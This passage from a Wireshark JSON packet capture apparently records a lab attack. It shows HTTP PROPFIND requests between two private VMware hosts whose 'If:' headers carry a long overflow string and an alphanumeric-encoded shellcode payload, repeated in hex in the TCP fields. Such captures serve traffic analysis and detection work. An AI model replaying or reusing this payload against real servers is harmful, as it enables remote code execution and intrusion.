HRWrSlraO1DS8nlbWmVkW9oHUtxV0M1IpypKyi4Ntb0bHNIu00kypioIENpNpPP201020a0npS8xjLOGogpIoweF7PjkUS8Upw814n5PhLBipjqqLriXfqZlPr6b7ph3iteadqQKOweCUEpd4JlYopN9xbUHl0hzPWEVBR6yofu0j9pQZkTqFR7oxKRyIfhoo9oHUDKp63QZVpKqH0OnrbmlN2JmpoxM0N0ypKP0QRJipphpX6D0Sk5ioGeBmDX9pkQ9pM0r3R6pPBJKP0Vb3B738KRxYFh1OIoHU9qUsNIUv1ehnQKqIomr5Og4IYOgxLPkPM0yp0kS9RLplaUT22V2UBLD4RUqbs5LqMbOC1Np1gPdjkNUpBU9k1q8oypm19pM0NQyK9rmL9wsYersPK2LOjbklmF4JztkWDFjtmObhMDIwyn90SE7xMa7kKN7PYrmLywcZN4IwSVZtMOqxlTLGIrn4ko1zKdn7P0B5IppEmyBUjEaOUsAA>\r\n",
|
||
"\\r\\n": "",
|
||
"http.request.full_uri": "http://192.168.68.1/",
|
||
"http.request": "1",
|
||
"http.request_number": "1",
|
||
"http.response_in": "196"
|
||
}
|
||
}
|
||
}
|
||
},
|
||
{
|
||
"_index": "packets-2020-07-17",
|
||
"_type": "doc",
|
||
"_score": null,
|
||
"_source": {
|
||
"layers": {
|
||
"frame": {
|
||
"frame.interface_id": "0",
|
||
"frame.interface_id_tree": {
|
||
"frame.interface_name": "\\Device\\NPF_{A3208914-5057-4474-9535-A579B0FE0EE5}"
|
||
},
|
||
"frame.encap_type": "1",
|
||
"frame.time": "Jul 17, 2020 03:19:53.497972000 SE Asia Standard Time",
|
||
"frame.offset_shift": "0.000000000",
|
||
"frame.time_epoch": "1594930793.497972000",
|
||
"frame.time_delta": "0.000008000",
|
||
"frame.time_delta_displayed": "0.007344000",
|
||
"frame.time_relative": "16.748912000",
|
||
"frame.number": "203",
|
||
"frame.len": "335",
|
||
"frame.cap_len": "335",
|
||
"frame.marked": "0",
|
||
"frame.ignored": "0",
|
||
"frame.protocols": "eth:ethertype:ip:tcp:http",
|
||
"frame.coloring_rule.name": "HTTP",
|
||
"frame.coloring_rule.string": "http || tcp.port == 80 || http2"
|
||
},
|
||
"eth": {
|
||
"eth.dst": "00:0c:29:50:92:ec",
|
||
"eth.dst_tree": {
|
||
"eth.dst_resolved": "VMware_50:92:ec",
|
||
"eth.dst.oui": "3113",
|
||
"eth.dst.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:50:92:ec",
|
||
"eth.addr_resolved": "VMware_50:92:ec",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.dst.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.dst.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.src": "00:0c:29:53:25:34",
|
||
"eth.src_tree": {
|
||
"eth.src_resolved": "VMware_53:25:34",
|
||
"eth.src.oui": "3113",
|
||
"eth.src.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:53:25:34",
|
||
"eth.addr_resolved": "VMware_53:25:34",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.src.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.src.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.type": "0x00000800"
|
||
},
|
||
"ip": {
|
||
"ip.version": "4",
|
||
"ip.hdr_len": "20",
|
||
"ip.dsfield": "0x00000000",
|
||
"ip.dsfield_tree": {
|
||
"ip.dsfield.dscp": "0",
|
||
"ip.dsfield.ecn": "0"
|
||
},
|
||
"ip.len": "321",
|
||
"ip.id": "0x0000b0bb",
|
||
"ip.flags": "0x00004000",
|
||
"ip.flags_tree": {
|
||
"ip.flags.rb": "0",
|
||
"ip.flags.df": "1",
|
||
"ip.flags.mf": "0"
|
||
},
|
||
"ip.frag_offset": "0",
|
||
"ip.ttl": "64",
|
||
"ip.proto": "6",
|
||
"ip.checksum": "0x00007f94",
|
||
"ip.checksum.status": "2",
|
||
"ip.src": "192.168.68.21",
|
||
"ip.addr": "192.168.68.21",
|
||
"ip.src_host": "192.168.68.21",
|
||
"ip.host": "192.168.68.21",
|
||
"ip.dst": "192.168.68.1",
|
||
"ip.addr": "192.168.68.1",
|
||
"ip.dst_host": "192.168.68.1",
|
||
"ip.host": "192.168.68.1"
|
||
},
|
||
"tcp": {
|
||
"tcp.srcport": "40101",
|
||
"tcp.dstport": "80",
|
||
"tcp.port": "40101",
|
||
"tcp.port": "80",
|
||
"tcp.stream": "41",
|
||
"tcp.len": "269",
|
||
"tcp.seq": "1449",
|
||
"tcp.seq_raw": "4089701719",
|
||
"tcp.nxtseq": "1718",
|
||
"tcp.ack": "1",
|
||
"tcp.ack_raw": "2023214216",
|
||
"tcp.hdr_len": "32",
|
||
"tcp.flags": "0x00000018",
|
||
"tcp.flags_tree": {
|
||
"tcp.flags.res": "0",
|
||
"tcp.flags.ns": "0",
|
||
"tcp.flags.cwr": "0",
|
||
"tcp.flags.ecn": "0",
|
||
"tcp.flags.urg": "0",
|
||
"tcp.flags.ack": "1",
|
||
"tcp.flags.push": "1",
|
||
"tcp.flags.reset": "0",
|
||
"tcp.flags.syn": "0",
|
||
"tcp.flags.fin": "0",
|
||
"tcp.flags.str": "·······AP···"
|
||
},
|
||
"tcp.window_size_value": "502",
|
||
"tcp.window_size": "64256",
|
||
"tcp.window_size_scalefactor": "128",
|
||
"tcp.checksum": "0x0000714b",
|
||
"tcp.checksum.status": "2",
|
||
"tcp.urgent_pointer": "0",
|
||
"tcp.options": "01:01:08:0a:89:ad:cb:11:00:00:00:00",
|
||
"tcp.options_tree": {
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.timestamp": "08:0a:89:ad:cb:11:00:00:00:00",
|
||
"tcp.options.timestamp_tree": {
|
||
"tcp.option_kind": "8",
|
||
"tcp.option_len": "10",
|
||
"tcp.options.timestamp.tsval": "2309868305",
|
||
"tcp.options.timestamp.tsecr": "0"
|
||
}
|
||
},
|
||
"tcp.analysis": {
|
||
"tcp.analysis.initial_rtt": "0.000580000",
|
||
"tcp.analysis.bytes_in_flight": "1717",
|
||
"tcp.analysis.push_bytes_sent": "1717"
|
||
},
|
||
"Timestamps": {
|
||
"tcp.time_relative": "0.000969000",
|
||
"tcp.time_delta": "0.000008000"
|
||
},
|
||
"tcp.payload": "36:44:30:53:6b:35:69:6f:47:65:42:6d:44:58:39:70:6b:51:39:70:4d:30:72:33:52:36:70:50:42:4a:4b:50:30:56:62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a",
|
||
"tcp.segment_data": "36:44:30:53:6b:35:69:6f:47:65:42:6d:44:58:39:70:6b:51:39:70:4d:30:72:33:52:36:70:50:42:4a:4b:50:30:56:62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"tcp.segments": {
|
||
"tcp.segment": "202",
|
||
"tcp.segment": "203",
|
||
"tcp.segment.count": "2",
|
||
"tcp.reassembled.length": "1717",
|
||
"tcp.reassembled.data": "50:52:4f:50:46:49:4e:44:20:2f:20:48:54:54:50:2f:31:2e:31:0d:0a:48:6f:73:74:3a:20:31:39:32:2e:31:36:38:2e:36:38:2e:31:0d:0a:55:73:65:72:2d:41:67:65:6e:74:3a:20:4d:6f:7a:69:6c:6c:61:2f:34:2e:30:20:28:63:6f:6d:70:61:74:69:62:6c:65:3b:20:4d:53:49:45:20:36:2e:30:3b:20:57:69:6e:64:6f:77:73:20:4e:54:20:35:2e:31:29:0d:0a:43:6f:6e:74:65:6e:74:2d:4c:65:6e:67:74:68:3a:20:30:0d:0a:49:66:3a:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:4b:6c:4e:69:4a:76:66:6e:76:4f:61:61:70:57:76:47:69:4b:66:68:65:4b:73:69:71:54:57:4a:4a:53:4b:59:69:51:49:56:62:42:49:5a:62:69:43:78:52:61:6e:74:46:43:6c:51:57:54:69:66:42:47:71:58:6f:52:4d:78:73:58:76:48:70:54:76:5a:63:4b:63:53:62:74:48:68:50:5a:4d:4e:70:77:50:79:62:55:79:45:51:4b:69:4f:52:45:55:48:51:4c:74:e4:85:98:e6:85:b1:e6:b1:a5:e7:91:a6:e6:a1:ae:e4:99:a4:e4:bd:8f:e5:81:a6:e4:85:b7:e7:99:b5:e6:99:81:e5:89:a6:e5:a5:b6:e4:b1:a4:e7:a9:b1:e6:a5:8a:c8:82:c8:82:e1:8b:80:e6:a0:83:e5:a1:b4:e6:ad:8d:e6:8d:84:e4:85:83:e4:8d:b4:e4:b1:89:e7:8d:a1:e5:a9:b4:e7:95:b3:e4:89:b7:e4:a9:a5:e5:81:96:e6:9d:a8:e4:85:ad:e6:99:85:e6:b1:83:e4:9d:b6:e7:85:b1:e6:89:a9:e4:8d:84:e1:8f:80:e6:a0:83:3e:20:28:4e:6f:74:20:3c:6c:6f:63:6b:74:6f:6b:65:6e:3a:77:72:69:74:65:31:3e:29:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:4a:70:47:6e:61:57:52:57:50:41:65:6e:75:68:4b:79:71:41:66:6e:75:77:44:54:70:59:55:51:57:77:63:6b:66:48:55:61:72:73:52:44:66:75:77:68:68:51:45:66:6a:72:71:46:74:63:79:58:7a:46:6f:79:5a:69:54:51:73:43:56:6e:4a:65:4c:6e:61:65:47:4a:75:75:64:79:58:65:78:53:73:49:59:4a:48:78:79:4f:6b:4a:77:48:56:73:65:6f:76:49:59:e7:91:b6:e4:a5:87:e4:a5:ab:e4:b5:87:e4:95:98:e6:a9:8d:e4:b9:aa:e6:85:ac:e6:99:84:e4:91:92:e4:99:b3:e6:85:90:e7:a5:b1:e5:8d:ae:e1:8f:80:e6:a0:83:ef:8e:8d:e7:9e:bd:e5:a9:93:e4:a5:b1:e4:ad:96:e7:81:89:e1:8f:80:e6:a0:83:e6:8d:98:e6:ad:ab:e6:ad:b3:e6:b5:b0:e7:85:89:e7:85:9a:e7:99:94:e5:85:85:e6:82:82:e6:a0:81:eb:81:ac:e7:9e:bc:ef:80:81:e7:9e:be:e2:95:a3:e7:9e:bb:e1:84:94:e7:9e:ba:ef:89:84:e7:9e:bb:e4:85:81:e4:85:81:ee:b8:a2:e7:9e:bb:e9:a0:81:e7:9e:bc:e2:89:a5:e7:9e:be:e2:95:a3:e7:9e:bb:e9:91:af:cf:80:ed:91:81:e7:9e:bd:e4:a3:93:e7:9e:bb:e2:87:a0:e7:9e:bf:ef:84:82:e7:9e:bb:ef:b0:82:e7:9e:bb:ef:80:81:e7:9e:be:e8:b0:84:e7:9e:bd:e8:b0:85:e7:9e:bd:e2:95:a3:e7:9e:bb:e9:91:8f:cf:80:ed:91:81:e7:9e:bd:e8:8a:85:e7:9e:bb:e2:95:a3:e7:9e:bb:e9:82:90:e9:82:90:e6:96:91:e7:9e:be:e5:b9:94:ec:9a:83:e4:84:8a:56:56:59:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:6a:58:41:51:41:44:41:5a:41:42:41:52:41:4c:41:59:41:49:41:51:41:49:41:51:41:49:41:68:41:41:41:5a:31:41:49:41:49:41:4a:31:31:41:49:41:49:41:42:41:42:41:42:51:49:31:41:49:51:49:41:49:51:49:31:31:31:41:49:41:4a:51:59:41:5a:42:41:42:41:42:41:42:41:42:6b:4d:41:47:42:39:75:34:4a:42:59:6c:48:68:61:72:6d:30:69:70:49:70:53:30:75:39:69:55:4d:61:59:30:71:54:74:4b:42:30:4e:50:52:6b:71:42:4c:4c:42:6b:50:52:4d:44:62:6b:73:42:6c:68:6c:4f:77:47:4d:7a:6d:56:4e:51:6b:4f:54:6c:6d:6c:51:51:71:6c:6c:42:4c:6c:4d:50:47:51:56:6f:5a:6d:6a:61:46:67:58:62:49:62:72:32:4e:77:52:6b:31:42:7a:70:44:4b:6d:7a:4f:4c:74:4b:50:4c:6a:71:71:68:4a:43:61:38:7a:61:38:51:50:51:74:4b:61:49:6d:50:49:71:67:63:74:4b:4d:79:5a:78:6b:33:4d:6a:6e:69:52:6b:4d:64:64:4b:4d:31:36:76:6e:51:59:6f:56:4c:66:61:58:4f:6a:6d:39:71:75:77:50:38:57:70:30:75:6c:36:4c:43:71:6d:39:68:4f:4b:61:6d:4e:44:43:45:47:74:6e:78:42:6b:4f:68:4d:54:4b:51:56:73:32:46:74:4b:4c:4c:50:4b:64:4b:4e:78:4b:6c:59:71:5a:33:74:4b:4c:44:44:4b:59:71:58:50:64:49:71:34:6e:44:6e:44:6f:6b:71:4b:53:31:70:59:31:4a:62:31:79:6f:4b:30:4f:6f:31:4f:51:4a:62:6b:5a:72:48:6b:72:6d:61:4d:62:48:4c:73:4c:72:59:70:6b:50:42:48:52:57:72:53:6c:72:61:4f:31:44:53:38:6e:6c:62:57:6d:56:6b:57:39:6f:48:55:74:78:56:30:4d:31:49:70:79:70:4b:79:69:34:4e:74:62:30:62:48:4e:49:75:30:30:6b:79:70:69:6f:49:45:4e:70:4e:70:50:50:32:30:31:30:32:30:61:30:6e:70:53:38:78:6a:4c:4f:47:6f:67:70:49:6f:77:65:46:37:50:6a:6b:55:53:38:55:70:77:38:31:34:6e:35:50:68:4c:42:69:70:6a:71:71:4c:72:69:58:66:71:5a:6c:50:72:36:62:37:70:68:33:69:74:65:61:64:71:51:4b:4f:77:65:43:55:45:70:64:34:4a:6c:59:6f:70:4e:39:78:62:55:48:6c:30:68:7a:50:57:45:56:42:52:36:79:6f:66:75:30:6a:39:70:51:5a:6b:54:71:46:52:37:6f:78:4b:52:79:49:66:68:6f:6f:39:6f:48:55:44:4b:70:36:33:51:5a:56:70:4b:71:48:30:4f:6e:72:62:6d:6c:4e:32:4a:6d:70:6f:78:4d:30:4e:30:79:70:4b:50:30:51:52:4a:69:70:70:68:70:58:36:44:30:53:6b:35:69:6f:47:65:42:6d:44:58:39:70:6b:51:39:70:4d:30:72:33:52:36:70:50:42:4a:4b:50:30:56:62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"http": {
|
||
"PROPFIND / HTTP/1.1\\r\\n": {
|
||
"_ws.expert": {
|
||
"http.chat": "",
|
||
"_ws.expert.message": "PROPFIND / HTTP/1.1\\r\\n",
|
||
"_ws.expert.severity": "2097152",
|
||
"_ws.expert.group": "33554432"
|
||
},
|
||
"http.request.method": "PROPFIND",
|
||
"http.request.uri": "/",
|
||
"http.request.version": "HTTP/1.1"
|
||
},
|
||
"http.host": "192.168.68.1",
|
||
"http.request.line": "Host: 192.168.68.1\r\n",
|
||
"http.user_agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
|
||
"http.request.line": "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n",
|
||
"http.content_length_header": "0",
|
||
"http.content_length_header_tree": {
|
||
"http.content_length": "0"
|
||
},
|
||
"http.request.line": "Content-Length: 0\r\n",
|
||
"http.request.line": "If: <http://192.168.68.1:80/KlNiJvfnvOaapWvGiKfheKsiqTWJJSKYiQIVbBIZbiCxRantFClQWTifBGqXoRMxsXvHpTvZcKcSbtHhPZMNpwPybUyEQKiOREUHQLt<4C><74><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> (Not <locktoken:write1>) <http://192.168.68.1:80/JpGnaWRWPAenuhKyqAfnuwDTpYUQWwckfHUarsRDfuwhhQEfjrqFtcyXzFoyZiTQsCVnJeLnaeGJuudyXexSsIYJHxyOkJwHVseovIY<49><59><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>VVYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBYlHharm0ipIpS0u9iUMaY0qTtKB0NPRkqBLLBkPRMDbksBlhlOwGMzmVNQkOTlmlQQqllBLlMPGQVoZmjaFgXbIbr2NwRk1BzpDKmzOLtKPLjqqhJCa8za8QPQtKaImPIqgctKMyZxk3MjniRkMddKM16vnQYoVLfaXOjm9quwP8Wp0ul6LCqm9hOKamNDCEGtnxBkOhMTKQVs2FtKLLPKdKNxKlYqZ3tKLDDKYqXPdIq4nDnDokqKS1pY1Jb1yoK0Oo1OQJbkZrHkrmaMbHLsLrYpkPBHRWrSlraO1DS8nlbWmVkW9oHUtxV0M1IpypKyi4Ntb0bHNIu00kypioIENpNpPP201020a0npS8xjLOGogpIoweF7PjkUS8Upw814n5PhLBipjqqLriXfqZlPr6b7ph3iteadqQKOweCUEpd4JlYopN9xbUHl0hzPWEVBR6yofu0j9pQZkTqFR7oxKRyIfhoo9oHUDKp63QZVpKqH0OnrbmlN2JmpoxM0N0ypKP0QRJipphpX6D0Sk5ioGeBmDX9pkQ9pM0r3R6pPBJKP0Vb3B738KRxYFh1OIoHU9qUsNIUv1ehnQKqIomr5Og4IYOgxLPkPM0yp0kS9RLplaUT22V2UBLD4RUqbs5LqMbOC1Np1gPdjkNUpBU9k1q8oypm19pM0NQyK9rmL9wsYersPK2LOjbklmF4JztkWDFjtmObhMDIwyn90SE7xMa7kKN7PYrmLywcZN4IwSVZtMOqxlTLGIrn4ko1zKdn7P0B5IppEmyBUjEaOUsAA>\r\n",
|
||
"\\r\\n": "",
|
||
"http.request.full_uri": "http://192.168.68.1/",
|
||
"http.request": "1",
|
||
"http.request_number": "1",
|
||
"http.response_in": "205"
|
||
}
|
||
}
|
||
}
|
||
},
|
||
{
|
||
"_index": "packets-2020-07-17",
|
||
"_type": "doc",
|
||
"_score": null,
|
||
"_source": {
|
||
"layers": {
|
||
"frame": {
|
||
"frame.interface_id": "0",
|
||
"frame.interface_id_tree": {
|
||
"frame.interface_name": "\\Device\\NPF_{A3208914-5057-4474-9535-A579B0FE0EE5}"
|
||
},
|
||
"frame.encap_type": "1",
|
||
"frame.time": "Jul 17, 2020 03:19:53.504076000 SE Asia Standard Time",
|
||
"frame.offset_shift": "0.000000000",
|
||
"frame.time_epoch": "1594930793.504076000",
|
||
"frame.time_delta": "0.000066000",
|
||
"frame.time_delta_displayed": "0.006104000",
|
||
"frame.time_relative": "16.755016000",
|
||
"frame.number": "212",
|
||
"frame.len": "333",
|
||
"frame.cap_len": "333",
|
||
"frame.marked": "0",
|
||
"frame.ignored": "0",
|
||
"frame.protocols": "eth:ethertype:ip:tcp:http",
|
||
"frame.coloring_rule.name": "HTTP",
|
||
"frame.coloring_rule.string": "http || tcp.port == 80 || http2"
|
||
},
|
||
"eth": {
|
||
"eth.dst": "00:0c:29:50:92:ec",
|
||
"eth.dst_tree": {
|
||
"eth.dst_resolved": "VMware_50:92:ec",
|
||
"eth.dst.oui": "3113",
|
||
"eth.dst.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:50:92:ec",
|
||
"eth.addr_resolved": "VMware_50:92:ec",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.dst.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.dst.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.src": "00:0c:29:53:25:34",
|
||
"eth.src_tree": {
|
||
"eth.src_resolved": "VMware_53:25:34",
|
||
"eth.src.oui": "3113",
|
||
"eth.src.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:53:25:34",
|
||
"eth.addr_resolved": "VMware_53:25:34",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.src.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.src.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.type": "0x00000800"
|
||
},
|
||
"ip": {
|
||
"ip.version": "4",
|
||
"ip.hdr_len": "20",
|
||
"ip.dsfield": "0x00000000",
|
||
"ip.dsfield_tree": {
|
||
"ip.dsfield.dscp": "0",
|
||
"ip.dsfield.ecn": "0"
|
||
},
|
||
"ip.len": "319",
|
||
"ip.id": "0x00003a1c",
|
||
"ip.flags": "0x00004000",
|
||
"ip.flags_tree": {
|
||
"ip.flags.rb": "0",
|
||
"ip.flags.df": "1",
|
||
"ip.flags.mf": "0"
|
||
},
|
||
"ip.frag_offset": "0",
|
||
"ip.ttl": "64",
|
||
"ip.proto": "6",
|
||
"ip.checksum": "0x0000f635",
|
||
"ip.checksum.status": "2",
|
||
"ip.src": "192.168.68.21",
|
||
"ip.addr": "192.168.68.21",
|
||
"ip.src_host": "192.168.68.21",
|
||
"ip.host": "192.168.68.21",
|
||
"ip.dst": "192.168.68.1",
|
||
"ip.addr": "192.168.68.1",
|
||
"ip.dst_host": "192.168.68.1",
|
||
"ip.host": "192.168.68.1"
|
||
},
|
||
"tcp": {
|
||
"tcp.srcport": "42555",
|
||
"tcp.dstport": "80",
|
||
"tcp.port": "42555",
|
||
"tcp.port": "80",
|
||
"tcp.stream": "42",
|
||
"tcp.len": "267",
|
||
"tcp.seq": "1449",
|
||
"tcp.seq_raw": "3277712175",
|
||
